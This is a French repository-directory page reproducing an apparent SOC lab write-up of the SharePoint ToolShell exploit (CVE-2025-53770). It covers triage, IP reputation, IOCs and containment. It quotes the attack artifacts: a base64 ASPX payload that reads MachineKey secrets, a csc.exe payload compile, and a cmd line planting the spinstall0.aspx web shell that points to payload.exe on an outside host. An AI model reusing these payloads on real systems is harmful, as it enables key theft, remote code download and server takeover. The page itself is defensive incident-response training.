Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell — Procédure détaillée de l'exploitation de la vulnérabilité zero-day CVE-2025-53770 (ToolShell) dans SharePoint, incluant l'analyse RCE, l'exfiltration de MachineKey, la compilation de la charge utile, le déploiement du web shell et les étapes de confinement de la réponse aux incidents. | Kitploit
Outils/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
Gestion des Indicateurs de Compromission (IOC)Analyse des VulnérabilitésExploitationExploitation d'Applications WebAnalyse de MalwareCriminalistique NumériqueTests d'IntrusionRenseignement sur les MenacesApprentissage et Éducation
Réponse aux Incidents
Labs et Pratique
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Voir le dépôt
3il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Procédure détaillée de l'exploitation de la vulnérabilité zero-day CVE-2025-53770 (ToolShell) dans SharePoint, incluant l'analyse RCE, l'exfiltration de MachineKey, la compilation de la charge utile, le déploiement du web shell et les étapes de confinement de la réponse aux incidents.

Partager

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

Introduction

Je me suis plongé dans un zero-day SharePoint appelé ToolShell (CVE-2025-53770) dans le laboratoire LetsDefend. J'ai simulé une attaque zero-day réelle où une requête POST malveillante a contourné l'authentification, exécuté PowerShell pour voler les clés MachineKeySection, compilé payload.exe, et déposé une web shell (spinstall0.aspx). J'ai tout enregistré, analysé le comportement, et contenu l'hôte. Ce README couvre les processus d'attaque, les étapes pour contrer l'attaque, et les leçons apprises.

Aperçu du laboratoire

  • Plateforme : LetsDefend Cyber Range
  • Cible : SharePoint Server (SharePoint01)
  • CVE : CVE-2025-53770
  • Objectif : Analyser l'exécution de code à distance (RCE), pratiquer la détection et le confinement

Outils utilisés :

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • LetsDefend Log Management
  • LetsDefend Enpoint Security
  • Décodeur Base64
  • LetsDefend Threat Intel

L'alerte

image

Il s'agit d'une alerte critique et d'une activité suspecte qui a ciblé ToolPane.aspx de MS SharePoint avec une charge utile de grande taille et un Referer usurpé. Le contexte CVE est lié à CVE-2025-53770. Il s'agit d'une vulnérabilité critique d'exploitation de SharePoint via une requête POST spécialement conçue qui permettait à des attaquants non authentifiés. L'exploitation réussie a conduit à une exécution de code à distance (RCE) sur le serveur. J'ai traité cela comme actif, de haute urgence et j'ai supposé une possible compromission réussie jusqu'à preuve du contraire.

Brève signification de SharePoint

Microsoft SharePoint est une plateforme de collaboration d'entreprise et de gestion de documents — essentiellement un hub sécurisé et organisé pour les fichiers, les workflows et les applications web internes.

Utilisations principales

  • Gestion de documents : Contrôle de version, pistes d'audit et permissions de fichiers
  • Collaboration : Plusieurs utilisateurs peuvent co-éditer et partager des documents
  • Intranet / Portails : Actualités internes, politiques RH, tableaux de bord
  • Workflows et automatisation : Formulaires, approbations et notifications
  • Intégration : Se connecte avec Teams, Outlook, les applications Office et Power BI

Considérations de sécurité SharePoint

  • Utilise Active Directory ou SSO pour l'authentification
  • Données chiffrées au repos et en transit
  • Les composants WebParts et les mises en page peuvent être abusés s'ils sont mal configurés
  • Le patching régulier est essentiel pour se défendre contre les exploits zero-day

Qu'est-ce que CVE-2025-53770 (ToolShell)

Un zero-day critique dans Microsoft SharePoint Server qui permet aux attaquants d'exécuter du code à distance sans authentification. Il abuse de la désérialisation non sécurisée et s'enchaîne souvent avec d'autres failles SharePoint (CVE-2025-49704, CVE-2025-49706) pour une prise de contrôle complète du système. Noté CVSS 9.8 (Critique) et activement exploité dans la nature.

Analyse de l'attaque avec VirusTotal

J'ai analysé l'adresse IP de l'expéditeur (adresse IP source) avec VirusTotal Adresse IP source : 107.191.58.76 image

De cela, je peux voir que 15/95 fournisseurs de sécurité ont signalé cette adresse IP comme malveillante, ce qui en dit déjà long sur l'IP.

Localisation de l'IP

Maintenant, je dois rechercher la localisation de l'IP. Cela a été fait à l'aide d'AbuseIPDB et comme montré ci-dessous, l'IP est connue pour le piratage, la force brute, l'attaque d'applications web, le scan de ports, l'empoisonnement DNS.

image

Analyse du point de terminaison

En tant qu'analyste SOC résolvant ce problème, l'une des étapes importantes à suivre est l'analyse du point de terminaison. J'ai recherché l'hôte sur la sécurité des points de terminaison avec le nom 'SharePoint01' et puisque l'IP est connue pour le piratage, pour une analyse plus approfondie.

image

après avoir localisé l'hôte, j'ai consulté l'historique du terminal pour vérifier la ligne de commande

image

| Ligne de commande de l'historique du terminal

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

Drapeaux PowerShell : -nop -w hidden -e

  • -nop = Aucun profil (éviter les scripts de profil).
  • -w hidden = démarrer la fenêtre cachée (furtif).
  • -e = commande encodée

Résultats de la ligne de commande avec le décodeur Base64 :

En raison de la charge utile, j'ai procédé au décodeur Base64 pour décoder la commande comme montré ci-dessous

image

L'utilisateur a lancé powershell depuis le répertoire système “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” et avec des commandes encodées un script C# côté serveur ASP.NET.

  • Utilise la réflexion pour charger l'assembly System.Web,
  • Accède à MachineKeySection non public et appelle une méthode non publique (GetApplicationConfig),
  • Lit les valeurs MachineKey de l'application web (ValidationKey, DecryptionKey, etc.),
  • Écrit ces clés dans la réponse HTTP (c'est-à-dire les exfiltre).

Capture des charges utiles et activités post-exploitation : / _layouts/15/ToolPane.aspx?...

La charge utile tente de lire et de divulguer la MachineKey ASP.NET pour l'hôte, un secret qui peut être utilisé pour forger des jetons ViewState/désérialisation et permettre le contournement d'authentification et l'exécution de code à distance. Cela correspond au modèle d'exploitation ToolShell (abus de MachineKey). Indicateurs de compromission (IoCs) clés dans la commande avec l'utilisation du décodage et encodage Base64.

  • La POST + grande charge utile + cette commande encodée indique que l'attaquant a probablement tenté de créer ou d'exécuter un tel script côté serveur via le chemin d'exploitation ToolShell.
  • L'exposition de la machine et l'alerte ont été déclenchées : L'utilisation de -encodedCommand + fenêtre cachée + charge utile base64 indique une évasion et une exploitation automatisée. Les attaquants utilisent fréquemment -encodedCommand pour cacher les charges utiles et éviter les modèles de journalisation de ligne de commande. Cela permet à un attaquant de créer un ViewState malveillant ou des charges utiles sérialisées que l'application acceptera comme valides, permettant le contournement d'authentification et l'exécution de code à distance sur des instances SharePoint vulnérables. Pour ToolShell (CVE-2025-53770), c'est exactement la chaîne d'exploitation.

Exécution CMD et exploitation

L'attaquant a tenté d'accéder à la configuration privée et vise à exploiter, abusant ainsi de .NET. Du décodeur Base64, nous pouvons voir System.Web.Configuration.MachineKeySection et GetApplicationConfig : MachineKeySection contient :

  • La ValidationKey de la machine/de l'application
  • La DecryptionKey de la machine/de l'application.

Ces clés sont des secrets utilisés pour protéger le ViewState et l'authentification par formulaires. Les récupérer est une tentative directe d'obtenir du matériel qui permet de forger/valider des charges utiles ASP.NET sérialisées → condition préalable directe pour l'exécution de code à distance basée sur la désérialisation.

RÉSULTATS DES COMMANDES CMD :

À peine TROIS secondes après comme montré ci-dessus, l'attaquant a envoyé une autre commande

image

| Ligne de commande de l'historique du terminal

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs.

Résultats

  • Les commandes montrent un compilateur C# (csc.exe) fourni avec le framework .NET. Son travail est de prendre du code source (fichiers .cs) et de le compiler en assembly .NET généralement .exe ou .dll.
  • L'attaquant a téléchargé ou créé un fichier source C# (payload.cs) sur l'hôte victime, puis a utilisé le compilateur .NET intégré (csc.exe) pour le compiler en un exécutable Windows (payload.exe). Cette charge utile pourrait être un logiciel malveillant.

AUTRE RÉSULTAT DE COMMANDE CMD :

À peine DEUX secondes après comme montré ci-dessus, l'attaquant a envoyé une autre commande

image

| Ligne de commande de l'historique du terminal

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs."C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx.

Résultats

  • L'attaquant a utilisé cmd.exe pour créer un nouveau fichier ASPX (spinstall0.aspx) dans le répertoire LAYOUTS de SharePoint en faisant écho à un formulaire/objet HTML dans ce chemin.
  • L'ASPX injecté contient un avec une Url="http://107.191.58.76/payload.exe", dirigeant le serveur ou un visiteur vers cette charge utile distante.
  • Placer le fichier sous ...\TEMPLATE\LAYOUTS\ le rend disponible via l'application web SharePoint (une porte dérobée/dropper persistante accessible via le web).
  • Cela indique une tentative de livraison/exécution à distance de payload.exe depuis l'hôte contrôlé par l'attaquant (107.191.58.76) et est un signe clair de compromission et de menace de persistance.
  • AUTRE RÉSULTAT DE COMMANDE CMD :

    À peine CINQ secondes après comme montré ci-dessus, l'attaquant a envoyé une autre commande

    image

    | Ligne de commande de l'historique du terminal

    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command"[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

    Résultats

    • A exécuté PowerShell à nouveau pour appeler System.Web.Configuration.MachineKeySection.GetApplicationConfig(), qui lit la configuration MachineKey de l'application.
    • Cela récupère la ValidationKey/DecryptionKey utilisées pour signer/chiffrer le ViewState et les jetons d'authentification, matériel qu'un attaquant peut utiliser pour forger des charges utiles sérialisées et contourner l'authentification.
    • Il s'agit d'une étape de reconnaissance/exfiltration claire et cohérente dans une chaîne d'exploitation de style ToolShell (préparation pour RCE) qui a été invoquée manuellement.

    Ces activités montrent un schéma cohérent et je le traiterai comme une compromission de haute confiance, et j'ai collecté des artefacts médico-légaux immédiatement.

    Renseignement sur les menaces

    Après avoir rassemblé toutes les commandes et résultats, j'ai fait des recherches supplémentaires sur le renseignement sur les menaces et j'ai cherché par type de données IP. La source de données montre OnlyHunt et TAG CVE-2025-53770 et avec Referer: /_layouts/SignOut.aspx pour le canal d'investigation des alertes montre qu'il s'agit d'un sharepoint légitime qui a été usurpé ou utilisé, puis déconnecté de sharepoint pour faire apparaître qu'il provenait d'une action normale de sharepoint. À ce moment, j'ai contenu l'hôte.

    image

    IOC (Artéfacts)

    • IP 107.191.58.76 : Adresse IP source de l'attaquant observée envoyant la POST d'exploitation
    • /_layouts/15/ToolPane.aspx?DisplayMode=Edit : Type "url". Point de terminaison d'exploitation ciblé par la POST
    • Spinstall0.aspx : Type "filename". Nom de fichier de la porte dérobée ASPX malveillante déployée
    • MachineKeySection : Type "string". Chaîne de code ASPX indiquant une exfiltration de MachineKey

    Ma note d'analyse et résumé

    Note d'analyste — SOC342 (CVE-2025-53770 / ToolShell) — SharePoint01

    Date/Time:2025-07-2213:07(event) Analyst:[YourName] CaseID:SOC342 Host:SharePoint01 Sévérité : Critique

    RÉSUMÉ

    J'ai repéré une tentative d'exploitation critique de vulnérabilité zero-day le 2025-07-22 à 13:07 appelée ToolShell (CVE-2025-53770) sur un serveur SharePoint sur site avec le nom d'hôte SharePoint01. L'attaquant, depuis une IP malveillante connue (107.191.58.76) qui est la source de la POST et de l'hôte de la charge utile, a contourné l'authentification pour exécuter du code à distance sur le serveur. L'attaquant a téléchargé/créé spinstall0.aspx dans le répertoire LAYOUTS de SharePoint et a exécuté PowerShell pour lire le matériel MachineKey ASP.NET et compiler une charge utile C# via csc.exe. Permettant ainsi de fabriquer des charges utiles de confiance. Cette activité est cohérente avec le déploiement de web shell via spinstall0.aspx dans SharePoint, l'exfiltration de MachineKey et la compilation de charge utile sur l'hôte, tous des indicateurs de compromission de haute confiance.

    MISE À JOUR DE MA NOTE D'ANALYSE DU PLAYBOOK

    image image

    ÉTAPES RECOMMANDÉES À SUIVRE POUR CONTRER LES ACTIVITÉS DE L'ATTAQUANT :

    Après avoir découvert la compromission, j'ai recommandé dans la note d'analyste que les étapes suivantes soient prises

    1. Contenir : Si autorisé, isoler SharePoint01 du réseau ; sinon, maintenir les restrictions de trafic sortant et bloquer les IP/clusters de l'attaquant.
    2. Rechercher : Chercher dans tous les SharePoint et s'assurer de sauvegardes adéquates
    3. Éradiquer : Supprimer les fichiers malveillants confirmés et toute tâche/service non autorisé ; inspecter pour d'autres persistances.
    4. Atténuer : Renouveler les valeurs ASP.NET/MachineKey et appliquer les correctifs d'urgence de Microsoft juillet 2025 à toutes les instances SharePoint sur site. Coordonner la rotation avec les propriétaires d'applications.
    5. Détecter et prévenir : Déployer/ajouter des règles de détection et rechercher dans l'environnement une activité similaire.
Télécharger l’outil